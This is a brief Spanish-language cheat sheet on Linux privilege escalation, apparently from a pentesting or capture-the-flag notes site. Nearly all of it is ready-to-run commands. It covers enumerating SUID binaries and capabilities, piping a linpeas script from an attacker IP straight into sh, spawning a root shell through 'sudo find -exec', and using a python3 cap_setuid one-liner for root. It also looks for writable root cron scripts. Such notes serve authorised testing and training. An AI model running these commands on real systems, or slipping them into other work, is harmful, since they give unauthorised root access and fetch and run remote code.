Escalada de Privilegios

Escalada en Linux

Vectores de privesc en Linux — SUID, sudo, capabilities, cron, kernel exploits y enumeración automatizada.

1 min de lectura

Índice▾

Enumeración rápida

id; sudo -l
uname -a
find / -perm -4000 -type f 2>/dev/null
getcap -r / 2>/dev/null

Automatiza con linpeas:

curl 10.10.14.5/linpeas.sh | sh

Si sudo -l permite ejecutar binarios, consulta GTFOBins:

sudo -l
# (ALL) NOPASSWD: /usr/bin/find
sudo find . -exec /bin/sh \; -quit

find / -perm -4000 -type f 2>/dev/null

Un SUID con bit de root mal configurado permite ejecutar como root. Cruza el binario con GTFOBins.

getcap -r / 2>/dev/null
# /usr/bin/python3 = cap_setuid+ep
./python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'

cat /etc/crontab
ls -la /etc/cron.*

Un script ejecutado por root con permisos de escritura para tu usuario es escalada directa.